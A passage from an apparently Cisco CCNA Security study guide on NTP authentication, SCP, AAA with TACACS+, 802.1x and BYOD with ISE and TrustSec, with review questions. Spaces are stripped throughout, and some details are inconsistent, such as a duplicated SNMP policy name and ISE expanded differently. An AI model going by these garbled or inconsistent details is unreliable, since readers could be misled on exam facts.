WhiletheneedtouseNTPiswithoutquestion,networkattacksleveragingNTPhaveappearedthatnowrequireyoutosecuretheoperationofNTPtopreventsuchattacks.TheseattackscanbepreventedbyconfiguringNTPauthentication.ThisinvolvessettingasharedsecretbetweentheNTPclientsandtheNTPserverthatwillbeusedtocomputeahashvalueoftheupdatesenttotheclient.Theclientwillperformahashcalculationoftheupdateusingthesamesharedkeyandwillcomparetheresults.AmatchservesasassurancethattheupdatecamefromthelegitimateNTPserver.Itisimportanttonotethatthisdoesnotencrypttheupdate;itonlyverifiesitsoriginandtrustworthiness.Figure8.2showstheprocess.
FIGURE8.2NTPauthenticationprocess
ToconfigureNTPauthentication,thehigh-levelsteps(tobeperformedonbothserverandclient)areasfollows:
1. ConfigureanNTPauthenticationkeynumberandMD5string(sharedsecret).
2. Specifyatleastonetrustedkeynumberreferencingthekeynumberinstep1.
3. EnableNTPauthentication.
Forthefirststep,let’sconfigureanNTPkeynumbered87withanassociatedMD5string(thesharedsecret)ofmykeyontworouters.
R88(config)#ntpauthentication-key87md5mykey
R89(config)#ntpauthentication-key87md5mykey
Nowlet’sspecifytheuseofkeynumber87anditsassociatedMD5stringtobeusedforNTPauthentication.
R88(config)#ntptrusted-key87
R89(config)#ntptrusted-key87
Finally,allyouneeddoisenableNTPauthentication.
R88(config)#ntpauthenticate
R89(config)#ntpauthenticate
UsingSCPforFileTransferWhileFTPandTFTPcanbeusedtotransferconfigurationsandIOSimagesacrossthenetwork,theseprotocolslacktheabilitytoencryptthetransmission.AbetteralternativeisSecureCopyProtocol(SCP).ThisisanimplementationoftheRemoteCopyProtocol(RCP)thatoperatesoveranSSHconnection.TheserverthatisusedtostoreimagesandconfigurationsmustbeconfiguredasanSCPserverwithakeythatcanbevalidatedbytheCiscodevices.Thatsetupisbeyondthescopeofthisbook;however,wewillcoverthecommandstobeusedontheCiscodevicestoperformanSCPtransfer.
Withtheserversetupinplace,yousimplyreferencetheSCPserverbyURLinthecopycommand.Forexample,iftheserverwerenamedscp-srvandyouwantedtocopytherunningconfigurationtoitunderthesecuritycontextofanaccountnamedAdminwithapasswordofmypass,whilenamingthefileR88-config.txt,youwouldusethefollowingcommand:
R88#copyrunscp://scp-srv/admin:mypass/r88-config.txt
Torestorethatfiletothestartupconfiguration,youwouldusethefollowingcommand:
R88#copyscp://scp-srv/admin:mypass/r88-config.txtstart
SummaryInthischapter,youlearnedaboutthesecuritydifferencesinmanagingdevicesfromin-bandandout-of-bandinterfaces.Youalsolearnedthatin-bandinterfacesincludeHTTP,VTY,andthephysicalinterfacesonthedeviceandthatout-of-bandinterfacesincludetheconsoleandAUXports.ThechapteralsodiscussedmethodsofsecuringmanagementinterfacesincludingenablingtheHTTPSserver,securingSNMPv3withasecuritypolicy,applyingpasswordstoallmanagementinterfaces,andusingSSHforremotemanagement.AmongtheothertopicscoveredinthischapterwerethetypesofbannermessagethatcanbeconfiguredandthesecuringoftheNTPprotocol.
ExamEssentialsIdentifyin-bandandout-of-bandinterfaces.In-bandinterfacesincludeHTTP,VTY,andthephysicalinterfacesonthedevice.Out-of-bandinterfacesincludetheconsoleandAUXports.
Describemethodstosecuremanagementinterfaces.TheseincludedisablingtheHTTPserverandenablingtheHTTPSserver,securingSNMPv3withasecuritypolicy,applyingpasswordstoallmanagementinterfaces,andusingSSHforremotemanagementratherthanTelnet.ItalsoincludesapplyingACLstoallmanagementinterfaces.
Identifythetypesofbannermessagesandtheiruse.Theseincludethemessageofthedaybanner,whichappearswhenaconnectionismade,andloginbanners,whichappearafterauthentication,aftertheMOTDandEXECbannersthatappear.
ListthethreesecuritypoliciesthatcanbeappliedtoSNMPv3.TheseincludeAuthNoPriv,whichisnohashingtosecureauthenticationorencryptionofdata;AuthNoPriv,whichishashingtosecureauthenticationbutnoencryptionofdata;andAuthPriv,whichishashingtosecureauthenticationandencryptionofdata.
DescribethestepstoconfigureNTPauthentication.ThesestepsareconfiguringanNTPauthenticationkeynumberandMD5string(sharedsecret),specifyingatleastonetrustedkeynumberreferencingthekeynumberinthefirststep,andenablingNTPauthentication.
ReviewQuestions1. Whichofthefollowingisanout-of-bandconnection?
A. HTTP
B. Con0
C. Gi0/1
D. VTY
2. WhatinformationisrequiredtosetupamodemontheAUXport?
A. Linenumber
B. AUXpassword
C. Transmissionrate
D. Modemmodel
3. Whichofthefollowingisavalidreasonforconfiguringaloopbackinterfaceasthemanagementinterface?
A. Itismoresecure.
B. Itprovidesbetterperformance.
C. Itisalwaysup.
D. Itispreconfigured.
4. WhatcommandenablesyoutoidentifythetotalnumberofVTYportsinthedevice?
A. R1(config)#line?
B. R1(config)#linevty?
C. R1#line?
D. R1#linevty?
5. HowarethelocationsofinformationcontainedinSNMPidentified?
A. MIB
B. OID
C. Informs
D. Traps
6. WhichSNMPsecuritypolicyprovideshashingtosecureauthenticationbutnoencryptionofdata?
A. noAuthNoPriv
B. AuthNoPriv
C. AuthPriv
D. Priv
7. Whichinterfacesshouldbeprotectedbypasswords?
A. VTY
B. Console
C. HTPS
D. Alloftheabove
8. WhichofthefollowingcommandsenablesencryptionofHTTPtransfers?
A. R81(config)#iphttpssecure
B. R81(config)#iphttpsserver
C. R81(config)#iphttpssecure-server
D. R81(config-line)#iphttpssecure-server
9. WhichcommandappliesACL99atthegrouplevel,whilereferringtothegrouptest-groupusingtheprivsecuritypolicywithwriteaccesstoaviewcalledwrite-view?
A. R84#snmp-servergrouptest-groupv3privwritewrite-viewaccess99
B. R84(config)#snmp-servertest-groupv3privwritewrite-viewaccess99
C. R84(config)#snmp-servergrouptest-groupv3privwrite-viewaccess99
D. R84(config)#snmp-servergrouptest-groupv3privwritewrite-viewaccess99
10. Whichofthefollowingisnotarecommendationforbannermessagewording?
A. UseofwordssuchasWelcomeshouldbeencouraged.
B. IfyouplantouseAAAaccountingrecordsinanysubsequentlegalproceeding,youmustinformintruderstheyarebeingaudited.
C. Youshouldalwaysstatetheownerofthesystemsotherewillbenolaterdefensethattheintruderwasunawareofthesystemowner.
D. Topreventanyfuturedefensethatpermissionwasimplied,alwaysstate“authorizedaccessonly.”
11. Whichofthefollowingisnotabannertype?
A. MOTD
B. EXEC
C. Login
D. Maintenance
12. Whichofthefollowingbannermessagesappearsatconnectiontime?
A. MOTD
B. EXEC
C. Login
D. Maintenance
13. WhenSNMPinformmessagesaresenttostations,whatvalueidentifiesthestation?
A. ProcessID
B. MACaddress
C. EngineID
D. RouterID
14. WhichofthefollowingstepsinconfiguringSNMPv3securityisoptional?
A. DefineanSNMPgroup
B. AssignanMIBview
C. Specifythecryptographicpolicytobeusedbythegroup
D. DefineSNMPusersandassignthemausergroup
15. Whatstatementisfalsewithregardtothefollowingcommand?R82(config)#snmp-serverviewread-view1.3.6.1.2.1included
A. Theviewisnameread-view.
B. read-viewisthegroupname.
C. 1.3.6.1.2.1istheOID.
D. Thiscommanddefinesaview.
16. HowisMD5usedinNTPauthentication?
A. Encryptsthedata
B. Hashestheupdate
C. Hashesthepassword
D. Encryptsthesharedsecret
17. WhichstepisnotpartofconfiguringNTPauthentication?
A. ConfigureanNTPauthenticationkeynumberandMD5string
B. Specifyatleastonetrustedkeynumberreferencingthekeynumber
C. Encryptthekeynumber
D. EnableNTPauthentication
18. WhichofthefollowingshouldbeusedasasecurealternativetoTFTPorFTP?
A. SCP
B. RTP
C. VTP
D. STP
19. WhenusingSCPtocopyfilestoanSCPserver,howdoyoureferencetheSCPserverinthecopycommand?
A. MACaddress
B. IPaddress
C. URL
D. Portnumber
20. InwhatrepositoryisSNMPdatacontained?
A. OID
B. MIB
C. Registry
D. Hardwareregister
Chapter9Understanding802.1xandAAACISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
2.2AAAconcepts
DescribeRADIUSandTACACS+technologies
ConfigureadministrativeaccessonaCiscorouterusingTACACS+
VerifyconnectivityonaCiscoroutertoaTACACS+server
ExplaintheintegrationofActiveDirectorywithAAA
DescribeauthenticationandauthorizationusingACSandISE
2.3802.1xauthentication
Identifythefunctionsof802.1xcomponents
Whileaccesstothenetworkandtonetworkresourcescanbecontrolledbyperforminguserauthenticationatthepointofentryintothenetwork,thisapproachcreatesalargerandlargermanagementheadacheasthenumberofnetworkentrydevicesgrows.Infact,creatingandmanaginguseraccountsanduserpasswordsacrossmultiplewirelessaccesspoints,RASservers,andVPNserversbecomesalmostunworkable.The802.1xstandardwascreatedtoaddressthisissue.Inthischapter,you’llexplore802.1xandtwocloselyrelatedtechnologiesthatmakeitpossible.
Inthischapter,youwilllearnthefollowing:
UnderstandingAAA802.1xcomponents
UsingRADIUSandTACACS+technologies
ConfiguringadministrativeaccesswithTACACS+
VerifyingrouterconnectivitytoTACACS+
IntegratingActiveDirectorywithAAA
PerformingauthenticationandauthorizationusingACSandISE
802.1xComponentsThe802.1xstandarddefinesaframeworkforcentralizedport-basedauthentication.Itcanbeappliedtobothwirelessandwirednetworksandusesthreecomponents.
Supplicant:Theuserordevicerequestingaccesstothenetwork
Authenticator:Thedevicethroughwhichthesupplicantisattemptingtoaccessthenetwork
Authenticationserver:Thecentralizeddevicethatperformsauthentication
Theroleoftheauthenticatorcanbeperformedbyawidevarietyofnetworkaccessdevices,includingremoteaccessservers(bothdial-upandVPN),switches,andwirelessaccesspoints.TheroleoftheauthenticationservercanbeperformedbyaRemoteAuthenticationDial-inUserService(RADIUS)orTerminalAccessControllerAccessControlSystem+(TACACS+)server.Theauthenticatorrequestscredentialsfromthesupplicantand,uponreceiptofthosecredentials,relaysthemtotheauthenticationserver,wheretheyarevalidated.Uponsuccessfulverification,theauthenticatorisnotifiedtoopentheportforthesupplicanttoallownetworkaccess.
Figure9.1illustratesthisprocess.
FIGURE9.1802.1x
RADIUSandTACACS+TechnologiesWhileRADIUSandTACACS+performthesameroles,theyhavedifferentcharacteristics.Thesedifferencesmustbetakenintoconsiderationwhenchoosingamethod.KeepinmindalsothatwhileRADIUSisastandard,TACACS+isCiscoproprietary.Table9.1comparesthem.
TABLE9.1RADIUSandTACACS+
Protocol TransportProtocol
Confidentiality Authentication,Authorization,andAccounting
SupportedLayer3Protocols
Devices Traffic
RADIUS UDP Passwordonly Combinesthethreeprocesses
AllbutRAS,NetBIOS,orX.25
NosupportforsecuringCiscocommands
Less
TACACS+ TCP EntirebodyexceptTACACs+header
Separatesthethreeprocesses
All SupportforsecuringCiscocommands
More
Manyconsiderenabling802.1xauthenticationonalldevicestobethebestprotectionyoucanprovideanetwork.
ConfiguringAdministrativeAccesswithTACACS+EarlieryoulearnedhowtosecureadministrativeaccesstoaCiscodeviceusingSSHovertheVTYlines.Youalsolearnedhowtocontroltheactivitiesofthosewithadministrativeaccessusingprivilegelevels.BothoperationscanalsobedoneusingAAAservices.Asyounowknow,theusernamesandpasswordscanbelocatedonanAAAserverratherthanonthelocaldevice.Havingsaidthat,itisalsopossibletotakeadvantageoftheseserviceswhilelocatingtheusernamesandpasswordonthelocaldevice.Regardingcontrollingtheactivitiesofthosewithadministrativeaccess,usinguseraccountsratherthanprivilegelevelsprovidesmoreaccountability.Inthissection,you’lllookathowusingAAAserviceschangestheseconfigurations.
LocalAAAAuthenticationandAccountingLocalAAAauthenticationandaccountingisaformofAAAinwhichtheuseraccountsarelocatedonthedeviceratherthanonanAAAserver.TouseAAAservicesforanytypeofauthentication,itmustbeenabledonthedevice.Includingthisstep,thehigh-levelstepstoconfigurelocalAAAauthenticationandaccountingareasfollows:
1. Createuseraccountswithanassignedprivilegelevelandpassword.
2. EnableAAAservices.
3. Configureanauthenticationmethodthatspecifieslocalauthentication.
4. ConfigureanauthorizationmethodforaccesstotheCLIthatspecifieslocalauthentication.
Let’sbeginbycreatingauseraccountnamedadminsrthathasaprivilegelevelof7withanencrypted(secret)passwordofsrpass.
R89(config)#usernameadminsrprivilege7secretsrpass
Nowlet’senableAAAservicesontherouter.
R89(config)#aaanew-model
Toconfigureanauthenticationmethodthatspecifieslocalauthenticationonalllines(byaddingthedefaultkeyword),usethiscommand:
R89(config)#aaaauthenticationlogindefaultlocal
Finally,let’sconfigureanauthorizationmethodthatprovidesaccesstotheCLI(byincludingtheexeckeyword)onalllines(byaddingthedefaultkeyword).
R89(config)#aaaauthorizationexecdefaultlocal
TheconfigurationwillapplyalllinesexceptfortheCon0.ThisgivesyouafallbackmethodtoaccesstheCLIifamisconfigurationofauthorizationlocksyouout.
SSHUsingAAAInChapter8,youlearnedhowtoconfigureSSHaccessontheVTYlines.Whenyoudidthat,youcreatedlocalaccountsandpasswordstoauthenticatethoseconnectingwithSSH.YoualsolearnedinChapter8howtoassignprivilegelevelstouseraccounts.IfyouuseAAAauthenticationforSSH,thenyoucanuseAAAtoauthorizetheassignedprivilegelevelofthesameaccountwhenauthenticationoccurs.Laterinthischapter,youwilllearnhowtouseaTACACS+serverastheauthenticationmethod.Inthisexample,youwillcontinuetousealocalAAAdatabase.Todothis,completethefollowingtasks:
1. EnableAAAservices.
2. Configureanauthenticationmethodthatspecifieslocalauthentication.
3. ConfigureanauthorizationmethodforaccesstotheCLIthatspecifieslocalauthentication.
ThesecommandsareexecutedmuchthesameaswhenyouweresettinguplocalAAAauthenticationandaccountingintheprevioussection.
ToenableAAAservicesontherouter,usethiscommand:
R89(config)#aaanew-model
Toconfigureanauthenticationmethodthatspecifieslocalauthenticationonalllines(byaddingthedefaultkeyword),usethiscommand:
R89(config)#aaaauthenticationlogindefaultlocal
ToconfigureanauthorizationmethodthatprovideaccesstotheCLI(byincludingtheexeckeyword)onalllines(byaddingthedefaultkeyword),usethiscommand:
R89(config)#aaaauthorizationexecdefaultlocal
Again,theconfigurationwillapplyalllinesexceptfortheCon0.ThisgivesyouafallbackmethodtoaccesstheCLIifamisconfigurationofauthorizationlocksyouout.
UnderstandingAuthenticationandAuthorizationUsingACSandISETofullyrealizethebenefitsofthe802.1xsecuritysolution,useraccountsandthesecuritypolicessurroundingthoseaccountsshouldbeinacentralizeddatabaseavailabletoalldevicesoperatingasauthenticators.Thedeviceoperatingastheauthenticationserverinthe802.1xframeworkistheAAAserver.
CiscoofferstwoAAAserversthatcanfulfilltheroleofauthenticatingserver.TheCiscoSecureAccessControlServer(ACS)canoperateeitherasaRADIUSserverorasaTACACS+server.TheCiscoIdentityServicesEngine(ISE)supportsonlyRADIUSatthetimeofthiswriting.However,itsupportsfunctionalitynotpresentintheCiscoACS.Additionalfeaturesincludethefollowing:
Profilingtodeterminethetypeofdevicefromwhichanetworkaccessrequestoriginatesandtoapplyasetofaccesspoliciesspecifictotheprofileattachedtothatdevice.Thismeansausermighthavemultipleprofileseachattachedtothevariousdevicestheyuse.
Postureassessmenttoverifytheminimumsecurityrequirementsofadevicebeforeallowingaccess.IfissuesarisesuchasmissingOSorsecurityupdates,thedevicemaybeeitherremediatedordeniedentry.
Centralizedwebaccessforguestaccesstothenetwork.
UnderstandingtheIntegrationofActiveDirectorywithAAABothCiscoAAAofferingssupportthecentralizationofuseraccountsandcredentialsontheAAAserver.However,inmostcases,doingsowouldconstituteaduplicationofeffortssincethissameinformationisalreadycontainedinadirectoryservicesserversuchasMicrosoftActiveDirectory.BothCiscoACSandCiscoISEcanconsultotherdatabasesforinformation.
TheabilityofthesetwoofferingstoutilizeanexternalenterpriseuserIDrepositoryisakeyfeature.WhilesomeCiscodevices,suchastheCiscoAdaptiveSecurityAppliance(ASA),cancommunicatedirectlywithLDAPrepositoriesorActiveDirectoryforauthenticationpurposes,mostdonot.Therefore,thedeploymentofanAAAserverservesasanimportantlinkbetweentheauthenticatorsinthe802.1xframeworkandtheexternalenterprisedirectoryservice.Inthenextsection,you’lllearnhowanauthenticatormightspeaktoanexternalenterprisedatabasethroughtheAAAserver,andyou’lldiscoverhowtosetupaCiscoroutertouseaTACACs+-basedAAAserver.
TACACS+onIOS
WhileanAAAservercanbepopulatedwithusernamesandcredentials,anAAAservercanalsoutilizethesameinformationthatresidesinanenterprisedirectoryservicesuchasActiveDirectory.Whenthisisthecase,theprocessthatoccursduringarequestfornetworkaccessoccursasfollows.Inthiscase,aTACACS+serverisinuse.
1. Thesupplicantestablishesaconnectionwiththeauthenticator(router,WAP,VPNserver).
2. Theauthenticatorchallengesthesupplicantforcredentials.
3. Thesuppliantrespondswithcredentials.
4. Theauthenticatorpassesthecredentialstotheauthenticationserver(AAAserver).
5. TheTACACS+serverconsultstheLDAPserver.
6. TheLDAPserverperformsauthentication.
7. Theauthenticatorpassestheresulttothesupplicant.
ConfiguringaRoutertoUseaTACACS+ServerThestepstoconfigurearoutertouseaTACACS+serverareasfollows:
1. EnableAAAauthentication.
2. SpecifytheTACACs+servername.
3. SpecifytheTACACs+serverIPaddressandtype(IPv4orIPv6).
4. SpecifythekeystringusedasasharedsecretbetweentherouterandtheTACACS+server.
5. SpecifytheuseofTACACS+inthemethodlistforauthenticationandauthorization,whilealsospecifyingabackupmethod.
6. CreatelocalusernamesandcredentialsforuseincaseoflossofaccesstotheTACACS+server.
7. Enableper-commandauthorization(optional).
8. Enableaccountingofadministrativesessionsandoftheuseofspecificcommands(optional).
First,let’senableAAAasyouhavedonebefore.
R90(config#)AAAnew-model
Next,youmustdothefollowing:
R90(config)#tacacsserverservertac
R90(config-server-tacacs)#addressipv4192.168.56.6
R90(config-server-tacacs)#keymysecetkey
R90(config-server-tacacs)#exit
Next,let’sspecifytheuseofTACACS+inthemethodlistforauthenticationandauthorization,whilealsospecifyingabackupmethod.Inthiscase,thebackupislocalauthentication.
R90(config)#aaaauthenticationlogindefaultgrouptacacs+local
R90(config)#aaaauthorizationexecdefaultgrouptacacs+local
Asyouareusinglocalauthenticationasabackup,youneedtocreateanaccountforthatprocessshoulditbenecessary.Thisprocessisthesameasyoulearnedearlier.
R90(config)#usernameadminsrprivilege7secretsrpass
Optionally,youcanenableper-commandauthorization.Inthefollowingexample,therouterwillconsulttheTACACS+serverwheneveranadministratorentersanyprivilegelevel15commandsoranyconfigurationcommands.Iftheaccountlackstheauthorization,itwillbedenied,andanerrormessagewillappear.Again,youhavespecifiedlocalasthebackupmethodhere.
R90(config)#aaaauthorizationcommands15defaultgrouptacacs+local
R90(config)#aaaauthorizationconfig-commands
Optionally,youcanalsoenableaccountingofadministrativesessionsandoftheuseofspecificcommands.Inthefollowingexample,anaccountingrecordwillbesentatthestartofanadministrativesessiontotheEXECprocess,andanotherwillbesentattheendofthesession.
R90(config)#aaaaccountingexecdefaultstart-stopgrouptacacs+
Finally(againoptionally),thefollowingcommandcausesanaccountingrecordtobesentforeveryprivilegelevel15commandandeveryconfigurationcommand:
R90(config)#aaaaccountingcommands15defaultstop-onlygrouptacacs+
VerifyRouterConnectivitytoTACACS+OnceyouhaveconfiguredtherouterwiththeIPaddressoftheTACACS+server,youshouldverifythatyouhaveconnectivitybetweenthedevices.ThiscanbedonebyusingthetestcommandtotestanauthenticationusingtheTACACS+server.Forexample,totesttheusernamemytestwithapasswordofmypass,usethefollowingcommand:
R99(config)#testaaagrouptacacsmytestmypassnew-code
Sendingpassword
Usersucessfullyauthenticated
USERATTRIBUTES
Username0"mytest"
Reply-message0"Password:"
Asyoucansee,theauthenticationsucceeded,whichindicatesthatyouhaveconnectivitytotheTACACS+server.
SummaryInthischapter,youlearnedabouttheAAAservicethatcanbeprovidedbyTACACS+andRADIUSservers.Youalsolookedatconfiguringadministrativeaccesstoarouterusing
TACACS+.YoulearnedhowAAAcanbeintegratedwithActiveDirectory.YoulookedattheCiscoimplementationsofaRADIUSserverincludingtheCiscoSecureAccessControlServer(ACS)andtheCiscoIdentityServicesEngine(ISR).Finally,youlearnedaboutthefunctionsofvarious802.1xcomponents.
ExamEssentialsDescribetheRADIUSandTACACS+technologies.Understandthebenefitsofthesetechnologies,whichincludecentralizationofauthenticationandreductionofadministrativeoverhead.Alsoidentifythedifferencesbetweenthesetechnologies,whichincludetheportsusedandthewayintheyhandleauthentication,authorization,andaccountingfunctions.
ConfigureandverifyadministrativeaccesstoarouterusingTACACS+.ThisincludesenablingAAAservices,specifyingtheTACACs+servername,specifyingtheTACACs+serverIPaddressandtype(IPv4orIPv6),specifyingthekeystringusedasasharedsecretbetweentherouterandtheTACACS+server,andspecifyingtheuseofTACACS+inthemethodlistforauthenticationandauthorization,whilealsospecifyingabackupmethod.
ExplaintheintegrationofActiveDirectorywithAAA.DescribehowanActiveDirectoryservercanbeusedbyanAAAserverasarepositoryforusernamesandcredentials.
IdentifyCiscoimplementationsofAAAservers.TheseincludetheCiscoSecureAccessControlServer(ACS),whichcanoperateeitherasaRADIUSserverorasaTACACS+server.TheCiscoIdentityServicesEngine(ISR)supportsonlyRADIUSatthetimeofthiswriting.However,itsupportsfunctionalitynotpresentintheCiscoACS.
Identifythefunctionsof802.1xcomponents.Theseincludethesupplicant(thedevicerequestingaccess),theauthenticator(thenetworkaccessdevicetowhichyouareconnecting),andtheauthenticationserver(AAAserver).
ReviewQuestions1. Whichofthefollowingisanexampleoftheauthenticatorinthe802.1xstandard?
A. WirelessAP
B. TACACS+server
C. Userlaptop
D. AAAserver
2. WhichofthefollowingistrueaboutTACACs+?
A. Encryptsonlythepassword
B. SeparatesthethreeAAAprocesses
C. UsesUDP
D. CreateslesstrafficthanRADIUS
3. WhichofthefollowingcommandsenablesAAAservicesonarouter?
A. aaaenable
B. aaanew-model
C. enableaaa
D. aaaauthentication
4. Whatcommandconfiguresanauthenticationmethodthatspecifieslocalauthentication?
A. aaaauthenticationdefaultlocal
B. aaaauthenticationloginlocaldefault
C. aaaauthenticationlogindefaultlocal
D. aaalogindefaultlocal
5. WhenconfiguringanauthorizationmethodthatprovidesaccesstotheCLI,towhichlinedoestheconfigurationnotapply?
A. VTY0
B. CON0
C. AUX0
D. VTY1
6. WhichofthefollowingisaCiscoimplementationofanAAAserver?
A. SDM
B. ACS
C. PIX
D. ASA
7. WhichdevicecancommunicatedirectlywithLDAPrepositoriesorActiveDirectoryforauthenticationpurposes?
A. SDM
B. VTP
C. PIX
D. ASA
8. WhichofthefollowingcommandsspecifiestheTACACS+serverforarouter?
A. tacacsserverservername
B. serverservername
C. tacacsserveripaddress
D. serveripaddress
9. WhichcommandteststheauthenticationprocessandverifiesconnectivitytotheTACACS+server?
A. testaaagrouptacacsusernamepasswordnew-code
B. testaaagrouptacacspasswordnew-code
C. testaaagrouptacacsusernamenew-codepassword
D. testaaagrouptacacsusernamepassword
10. WhichofthefollowingcommandsspecifiestheuseofTACACS+inamethodlistforauthorizationwhilealsospecifyingabackupmethod?
A. aaaauthorizationdefaultgrouptacacs+local
B. aaaauthorizationexecdefaultgrouptacacs+local
C. aaaauthorizationexecdefaulttacacs+local
D. aaaauthorizationexecgrouptacacs+local
11. WhichofthefollowingstepsinconfiguringaroutertouseaTACACS+serverisoptional?
A. EnableAAAauthentication
B. SpecifytheTACACs+servername
C. Enableper-commandauthorization
D. SpecifytheTACACs+serverIPaddressandtype
12. WhenAAAservicesmakeuseofanLDAPserver,whichcomponentperformstheauthentication?
A. AAAserver
B. LDAPserver
C. Networkaccessdevice
D. Supplicant
13. Whichofthefollowingistheabilitytoverifyminimumsecurityrequirementsofadevicebeforeallowingaccess?
A. Profiling
B. Postureassessment
C. Supplication
D. Authorization
14. WhichofthefollowingcommandsconfiguresalocalauthorizationmethodthatprovidesaccesstotheCLIonalllines?
A. aaaauthorizationdefaultlocal
B. aaaauthorizationdefaultexeclocal
C. aaaauthorizationexecdefaultlocal
D. aaaauthorizationexecdefault
15. Whichcommandcreatesauseraccountnamedadminsrthathasaprivilegelevelof7withanencrypted(secret)passwordofsrpass?
A. usernameadminsrprivilege7secretsrpass
B. usernameadminsrprivilegesecret7srpass
C. usernameadminsrprivilegesrpass7secret
D. usernameprivilege7adminsrsecretsrpass
16. Regardingcontrollingtheactivitiesofthosewithadministrativeaccess,whyshouldyouuseuseraccountsratherthanprivilegelevels?
A. Betterperformance
B. Moreaccountability
C. Simplerconfiguration
D. Encryptedprocesses
17. WhichofthefollowingisfalseofRADIUS?
A. Industrystandard
B. UsesUDP
C. SupportsCiscocommands
D. Protectsonlythepassword
18. Whichstandardprovidesasecurityframeworkthatincludesasupplicant,authenticator,andauthenticationserver?
A. 802.11
B. 802.3
C. 802.1x
D. 802.5
19. Inthe802.1xframework,whichdevicecanoperateastheauthenticationserver?
A. RADIUS
B. WirelessAP
C. Userlaptop
D. VPNserver
20. Whichofthefollowingistheabilitytodeterminethetypeofdevicefromwhichanetworkaccessrequestisoriginating?
A. Postureassessment
B. Profiling
C. Classification
D. Contextualawareness
Chapter10SecuringaBYODInitiativeCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
2.4BYOD
TheBYODarchitectureframework
Describethefunctionofmobiledevicemanagement(MDM)
Despitethesecuritychallenges,usersareincreasinglydemandingtherighttousetheirpersonalmobiledevicesintheenterprise.Somewhatliketheclamorforwirelessaccesswitnessedmorethanadecadeago,thisoutcryforabringyourowndevice(BYOD)initiativehasreachedthepointwhereitcannolongerbeignored.Ithasgivenrisetothedevelopmentofmobilemanagementsoftwaretogaincontroloverthesepersonaldevices.
Inthischapter,youwilllearnthefollowing:
TheBYODarchitectureframework
Thefunctionofmobiledevicemanagement(MDM)
TheBYODArchitectureFrameworkToenablethesecuredeploymentofaBYODinitiative,Ciscohascreatedanarchitecturalframeworkthatprovidesthecomponentsrequiredtoallowuseofpersonaldeviceswhileensuringthatthesedevicesaresecureandfreefrommalwareeverytimetheyaccessthenetwork.Theframeworkmayincludethefollowingfunctions:
The802.1xframework
Mobiledevicemanagementsoftware
TheCiscoIntegratedServicesEngine
TheCiscoTrustSecprovisioningandmanagementplatform
Whileyoualreadyunderstandtherolethatthe802.1xframeworkplays,inthefollowingsections,therolethateachoftheotherfeaturesplaysintheCiscoBYODarchitecturalframeworkwillbediscussed.
CiscoISETheCiscoIntegratedServicesEngine(ISE)isacentralizedidentity-basedpolicyplatformthatprovidescontext-basedaccesscontrolforwired,wireless,andVPNconnections.ItcombinesAAA,postureassessmentandprofiling,andguestaccessmanagement.Thenetworkaccessdevices(NADs)canbewiredswitches,VPNservers,wirelessaccesspoints,andcontrollersandrouters.
ISEcantakemanyitemsintoaccountwhenassessingaconnectionrequest.Moreover,itcantakethesamecontext-baseditemintoaccountwhenaccessingauthorizationrequests.AsshowninFigure10.1,thefollowingcanbeconsideredduringboththeaccessrequestandtheauthorizationrequest:
Whoistheindividual?
Whatdevicearetheyusing?
Wherearetheyconnectingfrom?
Whenaretheyconnecting?
Howaretheyconnecting?
FIGURE10.1ISEcontext-basedaccess
TheISEcanmakeuseofseveraladvancedfeaturestoprovidegranularanddynamicaccesscontrolpolicies.Amongthesearethefollowing:
DownloadableACLs(dACLs):IP-basedACLsthatareimplementedondeviceswhenthepolicycallsforit
AutomaticVLANassignment:Toanemployee,guest,or,inthecaseofafailedhealthcheck,aremediationVLAN
SecurityGroupAccess(SGAs):Appliesasecuritygrouptag(SGT)thatuniformlyenforcesthesecuritygrouppolicyregardlessoftopology
Changeofauthorization(COA)updates:TheabilityofISEtochangetheauthorizationpolicyinrealtimeaftertheadministratormakesachangewithoutrequiringalog-offforthechangetotakeeffect
Postureassessment:Cancheckthehealthofadevicebeforeallowingaccessandifthecheckfailscanremediatethedevice
Finally,theISEcanacceptmanyauthenticationmechanisms,includingthefollowing:
802.1x:TheISEisafullyfunctionalAAAserver.
MACauthenticationbypass(MAB):Thisisaport-basedaccesscontrolusingtheMACaddressoftheendpoint.
Webauthentication(WebAuth):ThisenablesnetworkaccessforendhoststhatdonotsupportIEEE802.1Xauthentication.
Laterinthischapter,you’llseehowISEintegrateswithmobiledevicemanagementtomakesuccessfulandsecureBYODpossible.
CiscoTrustSecAnothercomponentintheCiscoBYODarchitectureframeworkisCiscoTrustSec.ItworksinconcertwithISEandothersecuritydevicestousesecuritygrouptagsandsecuritygroupACLs(SACLs)toprovideimprovedvisibilityintoanaccessrequest.Ituseslogicalpolicygroupingstodefinepoliciesthatcontrolbothaccessandauthorization.ThethreemainfunctionsofTrustSecaretodothefollowing:
Classifyeachdevicebyassigningasecuritygrouptag(SGT)toitsIPaddress.
Transportorcommunicatethisclassificationinformationthroughoutthenetworkusingaprocesscalledinlinetagging(forthosenetworkingdevicesthatsupportinlinetagging)orbyusingtheSGTeXchangeProtocol(SXP)forthosenetworkingdevicesthatdonot.
EnforcementofaccessrulesthroughtheexaminationoftheSGTs.
Let’slookathowTrustSecdoesthis.
SGTClassificationClassificationofadeviceisdonethroughtheSGTclassificationusingSGTtags.Thesetags,whichare16bitsinlength,canbeapplieddynamicallyorstatically.DynamictaggingisappliedthroughtheCiscoISE.Dynamictaggingispossiblewhentheauthenticationmethodis802.1x,MACbypass,orthroughwebauthentication.Indynamictagging,theISEpushestheSGTtothenetworkaccessdevice(NAD).
Statictaggingcanalsobeperformed,andwhendone,itcanbedoneeitherontheISEordirectlyintheNAD.ExamplesofthiscouldbetomapanentiresubnettoanSGTortomapaVLANtoanSGT.
InlineSGTTransport
Forthosedevicesthatsupportthefeature,inlineSGTtransportcanbeusedtopropagateSGTsthroughoutthenetwork.ThesendingdevicewillembedtheSGTintotheEthernetframeonegress.Thistagwillbereadbythereceivingdeviceandpropagatedtothenextdevice.TheSGTwillbeinanewsectionoftheEthernetheadercalledtheCiscoMetadata(CMD)header.ItslocationisshowninFigure10.2.Asyoucansee,theCMDholdsotherinformationbesidestheSGT.Overall,thisadds20bytestothesizeoftheheader.
FIGURE10.2CMD
Onethingtonoteisthatincaseswheretwonetworkingdevicesarealsousing802.1aesecurity(MACSec),theadditionofthe802.1aeheaderandICVfieldwillresultinatotaladditiontotheEthernetheaderof40bytes.
